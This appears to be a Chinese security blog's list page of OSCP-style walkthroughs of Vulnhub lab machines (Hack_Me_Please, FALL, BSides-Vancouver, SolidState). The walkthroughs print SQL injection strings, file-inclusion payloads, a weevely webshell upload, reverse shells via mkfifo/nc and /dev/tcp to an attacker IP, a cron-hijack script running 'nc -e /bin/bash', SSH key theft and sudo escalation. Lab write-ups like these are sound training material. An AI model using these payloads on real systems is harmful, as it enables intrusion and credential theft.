首页
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
13,170 阅读
2
全网最全渗透测试靶场推荐【2026最新靶场推荐】,拒绝信息差
7,852 阅读
3
2025最新渗透测试靶场推荐,新手必练的靶场推荐
6,261 阅读
4
src平台推荐,挖SRC必须知道的25个漏洞提交平台
5,815 阅读
5
几个常见的密码字典推荐
5,535 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
渗透测试
内网渗透
Linux
网络协议
vulnhub
靶场实战
SQL注入
提权
代理隧道
域渗透
信息收集
权限提升
hackmyvm
WAF绕过
AI安全
云安全
蓝队防御
权限维持
红队攻击
云服务
白小羽
累计撰写
192
篇文章
累计收到
2
条评论
首页
导航
工具导航
留言面板
友情链接
搜索到
92
篇与
的结果
2025-05-18
Hack_Me_Please,js信息泄露,二级目录遍历
【oscp】Hack_Me_Please,js信息泄露,二级目录遍历靶机地址:https://www.vulnhub.com/entry/hack-me-please-1,731/外网打点主机发现&端口扫描80端口这是一个静态页面mysql测试是否可以远程连接(可)Tips :ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chAIn,这个错误表示客户端与服务器之间建立安全连接时出现的SSL/TLS 证书验证错误解决办法通常有两种方法: 添加参数 --skip-ssl 添加参数 --ssl-mode=DISABLED 目录扫描看到一个html,不是php写的,进行目录爆破的时候就需要用到wfuzz或者gobuster既然是静态页面,那么我们直接打开控制台,这里注释信息有一个 /seeddms51x/seeddms-5.1.22///确保这个js文件与我们服务器端点上安装的应用相同:/seeddms51x/seeddms-5.1.22/访问这个应用http://10.10.10.201/seeddms51x/seeddms-5.1.22/经过一些列折腾后' or 1=1 --+ ' or 1=1 -- + ' or 1=1# " or 1=1 --+ " or 1=1 -- + " || 1=1 -- + " || 1=1 --+ " || 1=1 #继续信息收集,发现可以对这个上级目录进行扫描gobuster dir -u http://10.10.10.201/seeddms51x -w /data/SecLists_Dict/Discovery/Web-Content/directory-list-1.0.txt -x html,txt,php,js开放了,三个目录/conf /www /pear/conf/settings.xml丢给AI总结(注意oscp考试绝对不允许使用AI)有了数据库密码,那么就远程登录┌──(root㉿kali)-[/data/demo] └─# mysql -u seeddms -h 10.10.10.201 --skip-ssl -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or g. Your MySQL connection id is 72 Server version: 8.0.25-0ubuntu0.20.04.1 (Ubuntu) Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Support MariaDB developers by giving a star at https://github.com/MariaDB/server Type 'help;' or 'h' for help. Type 'c' to clear the current input statement. MySQL [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | seeddms | | sys | +--------------------+ 5 rows in set (0.006 sec) MySQL [(none)]> use seeddms Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MySQL [seeddms]> show tables; +------------------------------+ | Tables_in_seeddms | +------------------------------+ | tblACLs | | tblAttributeDefinitions | | tblCategory | | tblDocumentApproveLog | ------------------------------------------- | tblWorkflowTransitions | | tblWorkflows | | users | +------------------------------+ 43 rows in set (0.002 sec) MySQL [seeddms]> select * from users; +-------------+---------------------+--------------------+-----------------+ | Employee_id | Employee_first_name | Employee_last_name | Employee_passwd | +-------------+---------------------+--------------------+-----------------+ | 1 | saket | saurav | Saket@#$1337 | +-------------+---------------------+--------------------+-----------------+ 1 row in set (0.002 sec)发现Saket@#$1337登录不成功 MySQL [seeddms]> select * from tblUsers; +----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+ | id | login | pwd | fullName | emAIl | language | theme | comment | role | hidden | pwdExpiration | loginfAIlures | disabled | quota | homefolder | +----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+ | 1 | admin | f9ef2c539bad8a6d2f3432b6d49ab51a | Administrator | address@server.com | en_GB | | | 1 | 0 | 2021-07-13 00:12:25 | 0 | 0 | 0 | NULL | | 2 | guest | NULL | Guest User | NULL | | | | 2 | 0 | NULL | 0 | 0 | 0 | NULL | +----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+ 2 rows in set (0.001 sec)解密失败,那还有一种方法就是修改数据了修改密码为123456 md5加密后e10adc3949ba59abbe56e057f20f883eupdate tblUsers set pwd='e10adc3949ba59abbe56e057f20f883e' where login='admin';修改后就能登录了在mysql中还有一个信息是必须要收集的(这个配置不当能够直接getshell)MySQL [seeddms]> SHOW VARIABLES LIKE 'secure_file_priv'; +------------------+-----------------------+ | Variable_name | Value | +------------------+-----------------------+ | secure_file_priv | /var/lib/mysql-files/ | +------------------+-----------------------+ 1 row in set (0.019 sec)继续登录的后台,点击添加文档,发现能上传文件我们使用weevely生成一个php静态木马(它具有跨平台、隐蔽性好[增加免杀率]、支持多种功能等特点)weevely generate cmd shell.php把他上传上去那么这个shell路径怎么获取呢,这里可以检索一下历史漏洞,这里有一个命令执行查看一下需要获取文档ID example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd完整payload如下http://10.10.10.201/seeddms51x/data/1048576/10/1.php内网渗透使用weevely连接webshellweevely terminal http://10.10.10.201/seeddms51x/data/1048576/10/1.php cmd反弹shellrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.128 1234 >/tmp/f创建交互式终端python2 -c 'import pty; pty.spawn("/bin/bash")';内网信息收集的时候,看到一个logrotate计划任务www-data@ubuntu:/var/www/html/seeddms51x/data/1048576/10$ ls -al /etc/cron* ls -al /etc/cron* -rw-r--r-- 1 root root 1042 Feb 13 2020 /etc/crontab /etc/cron.d: total 36 drwxr-xr-x 2 root root 4096 Jul 2 2021 . drwxr-xr-x 133 root root 12288 Jul 3 2021 .. -rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder -rw-r--r-- 1 root root 285 Jul 16 2019 anacron -rw-r--r-- 1 root root 201 Feb 13 2020 e2scrub_all -rw-r--r-- 1 root root 712 Jun 20 2021 php -rw-r--r-- 1 root root 191 Jul 2 2021 popularity-contest /etc/cron.dAIly: total 68 drwxr-xr-x 2 root root 4096 Jul 2 2021 . drwxr-xr-x 133 root root 12288 Jul 3 2021 .. -rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder -rwxr-xr-x 1 root root 311 Jul 16 2019 0anacron -rwxr-xr-x 1 root root 539 Apr 13 2020 apache2 -rwxr-xr-x 1 root root 376 Dec 4 2019 apport -rwxr-xr-x 1 root root 1478 Apr 9 2020 apt-compat -rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmAInutils -rwxr-xr-x 1 root root 384 Nov 19 2019 cracklib-runtime -rwxr-xr-x 1 root root 1187 Sep 5 2019 dpkg -rwxr-xr-x 1 root root 377 Jan 21 2019 logrotate -rwxr-xr-x 1 root root 1123 Feb 25 2020 man-db -rwxr-xr-x 1 root root 4574 Jul 18 2019 popularity-contest -rwxr-xr-x 1 root root 214 Dec 7 2020 update-notifier-common www-data@ubuntu:/var/www/html/seeddms51x/data/1048576/10$ logrotate --version logrotate --version logrotate 3.14.0 Default mAIl command: /usr/bin/mAIl Default compress command: /bin/gzip Default uncompress command: /bin/gunzip Default compress extension: .gz Default state file path: /var/lib/logrotate/status ACL support: yes SELinux support: yes很遗憾,这个利用不了,版本太新(高)了然后我想到了刚进来的那个网页moonlight,这里有一个权限提升POC为c#计算机语言,大概率不适用于Linux想想看哪里还没有利用这是之前mysql中的用户表,存在一个用户Saket@#$1337我们查看/etc/passwd,是存在这个用户的www-data@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ su saket su saket Password: Saket@#$1337 To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for detAIls. saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ sudo -l sudo -l [sudo] password for saket: Saket@#$1337 Matching Defaults entries for saket on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin User saket may run the following commands on ubuntu: (ALL : ALL) ALL saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ sudo -i sudo -i root@ubuntu:~# whoami whoami root至此提权成功。往期推荐往期推荐不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学防溯源小技巧ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略【oscp】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS【渗透测试】Linux隐身登录
2025年05月18日
1,363 阅读
0 评论
0 点赞
2025-05-18
FALL,wfuzz对参数的模糊测试
【oscp】FALL,wfuzz对参数的模糊测试靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-fall,726/连接好kali,主机发现 & 端口扫描,发现了两个http服务,一个是80端口一个9090端口这是80界面这是9090界面随便点点,文件包含伪协议如下(利用失败)php://filter/read=convert.base64-encode/resource=index.php php://filter/resource=index.php php://filter/string.strip_tags|convert.base64-decode/resource=shell.php data://text/plain,<?php%20phpinfo();?> data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b file:///etc/passwd http://127.0.0.1/cmd.php?cmd=php://input POST数据:<?php phpinfo()?>看到网站底部,2.2.15版本漏洞检索,但是需要鉴权我们并没有登录后台这里看到一个用户发送的一个消息,留着有一个后门接下来进行目录扫描,发现有一个test.phpdirsearch -u http://10.10.10.199利用wfuzz工具,对参数进行爆破,并筛选出响应长度在100到100000之间的结果wfuzz -u http://10.10.10.200/test.php?FUZZ=/etc/passwd -w /data/SecLists_Dict/Discovery/Web-Content/small_common.txt --ss "^(.{100,100000})$"此时发现有一个file参数,访问payload,并发现写那篇文章的qiu用户,curl http://10.10.10.200/test.php?file=/etc/passwd查看是否存在id_rsa,这个文件呢是私匙,在linux中它非常的敏感,如果用户泄露了此文件,那么攻击者就可以利用此文件免密登录服务器,通过下面的命令,可以看到目标服务器泄露了此用户的文件curl http://10.10.10.200/test.php?file=/home/qiu/.ssh/id_rsa确保私钥文件的权限被严格限制。通常,私钥文件的权限应设置为 600(只有所有者可以读写),否则可能利用不成功。curl http://10.10.10.200/test.php?file=/home/qiu/.ssh/id_rsa > qiu chmod 600 qiu ssh qiu@10.10.10.200 -i qiu登录成功后,进行内网信息收集,外网还有一个9090端口的web,那么就来看数据库配置,密码为P@ssw0rdINSANITY查看表数据mysql> select * from cms_users -> ; +---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+ | user_id | username | password | admin_access | first_name | last_name | email | active | create_date | modified_date | +---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+ | 1 | qiu | bc8b9059c13582d649d3d9e48c16d67f | 1 | qiu qing | chan | qiu@goodtech.inc | 1 | 2021-05-21 17:06:29 | 2021-05-22 02:28:53 | | 2 | patrick | 6aea70cc6a678f0f83a82e1c753d7764 | 1 | Patrick | Ong | patrick@goodtech.inc | 1 | 2021-05-22 02:28:33 | 2021-05-22 16:54:13 | +---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+ 2 rows in set (0.00 sec)解密失败基本信息收集uname -a hostname # 主机名 # 系统信息相关 lsb_release -a cat /etc/os-release cat /proc/version # 权限相关 sudo -l # 查看可以使用sudo的文件 find / -perm -4000 -print 2>/dev/null # 查找 SUID文件 ls -al /etc/cron* # 查看所有计划任务 find / -perm 777 -type f 2>/dev/null # 查看文件权限为777的文件信息 # 其他信息收集 ps -aux netstat -tulnp history 直到历史命令测试sudo,提权成功(之前的mysql服务器密码也可以尝试)往期推荐不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学防溯源小技巧ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略【oscp】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS【渗透测试】linux隐身登录
2025年05月18日
1,741 阅读
0 评论
0 点赞
2025-05-18
BSides-Vancouver-2018-Workshop,ftp匿名登录,wordpress渗透
【oscp】BSides-Vancouver-2018-Workshop,FTP匿名登录,wordpress渗透下载地址:https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova难度:相对简单,有很多种方法主机发现端口扫描利用FTP的默认用户进行匿名登录,查看文件FTP 192.168.209.136 cd public get users.txt.bk像是一个密码字典(其实是一个用户字典,当前系统用户包含了这些用户)目录扫描robots.txt爬虫协议一个wordpress站点继续目录扫描利用wpscan发现可能存在的用户名,并使用msf的字典 wpscan --url http://192.168.209.136/backup_wordpress -e u -P /usr/share/wordlists/metasploit/burnett_top_1024.txt有俩个用户分别是john和admin,以及john的密码enigma登录进去直接修改404反弹shell的php脚本(kali自带/usr/share/webshells/php/php-reverse-shell.php)kali开启监听反弹成功创建交互式终端python -c "import pty; pty.spawn('/bin/bash')"基本信息收集,Ubuntu 12.04.4 LTS ,3.11.0-15没有内核提权漏洞,在往期的靶机中我们查看数据库密码(站点用到的就是mysql肯定存在mysql服务),thiscannotbeit登录成功查看用户表使用hash-identifier hash识别工具,识别hash类型md5解密切换思路,继续信息收集,查看文件权限为777的文件find / -perm 777 -type f 2>/dev/null那么就可以直接反弹shell提权echo '/bin/bash -i >& /dev/tcp/192.168.209.130/6666 0>&1' > cleanup ./cleanupkali端是有反应的,自动退出了换一个反弹shell命令echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.209.130 6666 >/tmp/f' > cleanup ./cleanup往期推荐【oscp】Tr0ll 靶机全系列(1-3),FTP被玩坏了【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏HTB-Chemistry靶机渗透教程ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略开箱即用!265种windows渗透工具合集--灵兔宝盒
2025年05月18日
1,181 阅读
0 评论
0 点赞
2025-05-18
Vuln靶机SolidState
【oscp】SolidState,计划任务提权靶场地址:https://www.vulnhub.com/entry/solidstate-1,261/发布日期:2018年9月12日目标:得到root权限&找到flag.txt主机探测,端口扫描一些端口介绍:(22,80忽略)25 端口:SMTP服务,用于发送电子邮件的协议110 端口:pop3是用于接收电子邮件的协议119 端口:是用于传输和读取Usernet新闻组文章的协议。4445 端口:是 JAMES 邮件服务器的远程管理接口,允许管理员通过命令行或Web界面管理邮件服务器的配置,包括用户管理、域名管理、邮件箱管理等。访问网页目录扫描这里是需要用到一个命令,来连接邮件服务器,指定好端口4555,然后使用弱口令root / root 进行登录,再使用help查看命令帮助telnet 是一个用于远程登录和管理服务器的网络协议和命令行工具。它允许用户通过网络连接到远程主机,并在该主机上执行命令。telnet 通常使用端口 23 进行通信,但也可以指定其他端口。listusers 用于显示现有的账户信息,但是我们不知道密码信息,就无法登录pop3邮件服务器,查看电子邮件内容user: james user: thomas user: john user: mindy user: mAIladmin设置(重置)密码setpassword james 123 setpassword thomas 123 setpassword john 123 setpassword mindy 123 setpassword mAIladmin 123登录我们的pop3服务器,用户james的邮件信息同理其他用户都这样查看,下面是john的邮件内容下面是mindy用户的第二封邮件翻译一下看看,这个就是 mindy 用户的ssh密码了username: mindy pass: P@55W0rd1!2@ssh登录后,但是发现系统对这个用户做出了命令执行的一些限制当前目录下有一个user.txt,包含了一个hash值,使用hash-identifierhash识别工具,识别这个加密的类型,但是没有识别到尝试逃逸shell,其他详细的逃逸过程可以参考我这篇文章https://mp.weixin.qq.com/s/YS3lNhIE5V5kFlBLxS49xA这里的逃逸是要用到 pythonssh username@IP "export TERM=xterm;python -c 'import pty;pty.spawn("/bin/bash")'"信息收集uname -a cat /etc/os-release # 没有lsb_release -a命令可以使用这个代替查看计划任务cat /etc/crontab查看文件权限为777的文件信息,不是root用户也能修改并执行文件,那如果这是个root用户设置的一个定时程序呢?查看py脚本内容看看nc 有没有-e参数,结果是有的nc 中的 -e 参数在 Netcat (nc) 中用于指定一个程序,使得 Netcat 在建立连接后执行该程序,并将 Netcat 的标准输入、输出和错误重定向到该程序。这个参数通常用于创建反向shell或监听shell。那么py脚本的内容就如下,来反弹shell#!/usr/bin/env python import os import sys try: os.system('nc 192.168.209.130 6666 -e /bin/bash') except: sys.exit()注意:如果重定向了,过了一会儿没有反弹成功,要么重新连接一次,就像这样这下就能反弹成功了,找到root.txt文件如果直接执行py文件的话,是以当前用户执行的,例如可以看到当前用户为 mindy往期推荐红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学Linux 32位Crossfire游戏缓冲区溢出独立开发零显卡AI引擎!媲美DeepSeek,附源码【oscp】Tr0ll 靶机全系列(1-3),FTP被玩坏了神器分享 红队快速打点工具-DarKnuclei从零开始学SQL注入(sql十大注入类型):技术解析与实战演练【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【渗透测试】12种rbash逃逸方式总结利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细
2025年05月18日
1,180 阅读
0 评论
0 点赞
2025-05-18
phpStudy 小皮 Windows面板 存在RCE漏洞(nday)
https://mp.weixin.qq.com/s/VcD3Gb8oTk0d5bW72e0P-A
2025年05月18日
1,429 阅读
0 评论
0 点赞
1
...
13
14
15
...
19